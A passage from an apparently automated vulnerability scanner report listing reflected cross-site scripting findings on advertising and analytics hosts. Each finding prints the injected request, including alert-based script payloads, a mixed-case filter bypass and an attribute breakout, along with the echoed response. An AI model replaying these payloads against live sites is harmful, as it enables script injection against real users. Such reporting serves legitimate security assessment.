Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Cteonnt-Length: 483
Content-Length: 483
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 16:38:38 GMT
Date: Sat, 17 Sep 2011 16:23:38 GMT
Connection: close
Vary: Accept-Encoding

var validRequest = true;

var server = "http://api.zap2it.com";
var requestParams = "ap=ptg&v=2&aid=f3j&zip=98101b7182"-alert(1)-"14f2f041e46&stnlt=10387,10520,10518";
var action;

action = "/tvlistings/ZCPrimeTimeGrid.do?";

if(requestParams!="" && validRequest) {
document.write("<scr" + "ipt ");
document.write("type='text/javasc
...[SNIP]...

4.115. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 49914<script>alert(1)</script>7a5c26187c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=249914<script>alert(1)</script>7a5c26187c&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:28:32 GMT
Date: Sat, 17 Sep 2011 16:28:32 GMT
Content-Length: 1240
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"249914<script>alert(1)</script>7a5c26187c", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.116. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload e4c54<script>alert(1)</script>6027ce286c9 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=16122&c5=44988&c6=&c10=237868e4c54<script>alert(1)</script>6027ce286c9&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:54:19 GMT
Date: Sat, 17 Sep 2011 16:54:19 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16122", c5:"44988", c6:"", c10:"237868e4c54<script>alert(1)</script>6027ce286c9", c15:"", c16:"", r:""});

4.117. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 8b174<script>alert(1)</script>253c92feb83 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=8b174<script>alert(1)</script>253c92feb83&tm=799493 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:36:32 GMT
Date: Sat, 17 Sep 2011 16:36:32 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"8b174<script>alert(1)</script>253c92feb83", c16:"", r:""});

4.118. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bb21d<script>alert(1)</script>a519cc9619e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156bb21d<script>alert(1)</script>a519cc9619e&c3=5839988&c4=43836708&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:34:58 GMT
Date: Sat, 17 Sep 2011 16:34:58 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6036156bb21d<script>alert(1)</script>a519cc9619e", c3:"5839988", c4:"43836708", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});

4.119. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 98bb8<script>alert(1)</script>512a5964b9b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=583998898bb8<script>alert(1)</script>512a5964b9b&c4=43836708&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:34:59 GMT
Date: Sat, 17 Sep 2011 16:34:59 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6036156", c3:"583998898bb8<script>alert(1)</script>512a5964b9b", c4:"43836708", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});

4.120. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload fcab9<script>alert(1)</script>d7ac84b85c6 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708fcab9<script>alert(1)</script>d7ac84b85c6&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:01 GMT
Date: Sat, 17 Sep 2011 16:35:01 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708fcab9<script>alert(1)</script>d7ac84b85c6", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});

4.121. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ad03d<script>alert(1)</script>3c8aa488771 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708&c5=70721135ad03d<script>alert(1)</script>3c8aa488771&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:02 GMT
Date: Sat, 17 Sep 2011 16:35:02 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135ad03d<script>alert(1)</script>3c8aa488771", c6:"", c10:"", c15:"", c16:"", r:""});

4.122. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9597a<script>alert(1)</script>f4456cf9540 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708&c5=70721135&c6=9597a<script>alert(1)</script>f4456cf9540& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:03 GMT
Date: Sat, 17 Sep 2011 16:35:03 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135", c6:"9597a<script>alert(1)</script>f4456cf9540", c10:"", c15:"", c16:"", r:""});

4.123. http://c.aol.com/read/_topic_stats [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.aol.com
Path:	/read/_topic_stats

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 522e9<script>alert(1)</script>70e589ec740 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /read/_topic_stats?ids=&links=http%3A%2F%2Fnai.glb.adtechus.com%2Fnai%2Fdaa.php7f0ce%2522-alert(document.location)-%2522a235be901d&blog_id=&dirty=true&callback=jsonp1316296586533522e9<script>alert(1)</script>70e589ec740 HTTP/1.1
Host: c.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:37:26 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Set-Cookie: gcp.dirty=true; Expires=Sat, 17-Sep-2011 17:42:26 GMT; Path=/
Content-Length: 203

jsonp1316296586533522e9<script>alert(1)</script>70e589ec740({
"status" : "OK",
"http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d" : {
"comments" : -1
}
});

4.124. http://choices.truste.com/ca [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 3519d<script>alert(1)</script>6de3af1e98f was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont33519d<script>alert(1)</script>6de3af1e98f&w=728&h=90&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:40:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5492
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ivName:"te-clr1-04c957cd-4db2-4ed6-9fbb-2fb88dc3baa8-itl",iconSpanId:"te-clr1-04c957cd-4db2-4ed6-9fbb-2fb88dc3baa8-icon",backgroundColor:"white",opacity:1,filterOpacity:100,containerId:"adconion01cont33519d<script>alert(1)</script>6de3af1e98f",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_04c957cd_4db2_4ed6_9fbb_2fb88dc3baa8_ib,interstitialWidth:480,interstitialHei
...[SNIP]...

4.125. http://choices.truste.com/ca [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a&c=adconion01cont3&w=728&h=90&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:39:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5574
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a style="color:#456d88;text-decoration:none; display:inline; padding: 0; margin: 0;" href="http://preferences.truste.com/preference.html?affiliateId=40&pid=adexpose01&aid=adconion01&cid=0511adc728x90dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a&w=728&h=90" target="_blank">
...[SNIP]...

4.126. http://choices.truste.com/ca [plc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload ecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont3&w=728&h=90&plc=trecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:41:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5492
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
_clr1_960d0403_4ed5_48db_a460_bf6870783bbf_bi={baseName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf",anchName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-anch",width:728,height:90,ox:0,oy:0,plc:"trecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1",iplc:"rel",intDivName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-itl",iconSpanId:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-icon",backgroundColor:"white",opacity:1,filterOpacity:100,containerId
...[SNIP]...

4.127. http://cm.npc-hearst.overture.com/js_1_0/ [css_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cm.npc-hearst.overture.com
Path:	/js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37b9"><script>alert(1)</script>c19849ec573 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=2130893885&type=home_page&ctxtId=home_page&keywordCharEnc=utf8&source=npc_hearst_stamfordadvocate_t2_ctxt&adwd=171&adht=630&ctxtUrl=http%3A%2F%2Fwww.stamfordadvocate.com%2F&css_url=http://www.stamfordadvocate.com/css/hdn/modules/ads/ysm.cssf37b9"><script>alert(1)</script>c19849ec573&refUrl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fthe-advocate.php&du=1&cb=1316294655906&ctxtContent=%3Chead%3E%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.google-analytics.com%2Fga.js%22%3E%3C%2Fscript%3E%3Cscript%3Evar%20HDN%20%3D%20HDN%20%7C%7C%20%7B%7D%3B%20HDN.t_firstbyte%20%3D%20Number(new%20Date())%3B%3C%2Fscript%3E%0A%09%09%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%20name%3D%22noname%22%3E%0A%0A%09%09%3C!--%20generated%20at%202011-09-17%2011%3A18%3A09%20on%20prodWCM3%20running%20v2.5.6_p1.9644%20--%3E%0A%0A%09%09%3Cmeta%20name%3D%22adwiz-site%22%20content%3D%22sa%22%3E%0A%09%09%3Cmeta%20name%3D%22skype_toolbar%22%20content%3D%22SKYPE_TOOLBAR_PARSER_COMPATIBLE%22%3E%0A%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09%2F%2F%20%3C HTTP/1.1
Host: cm.npc-hearst.overture.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMnF0tnc1cAC6ZN1ww=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:16 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
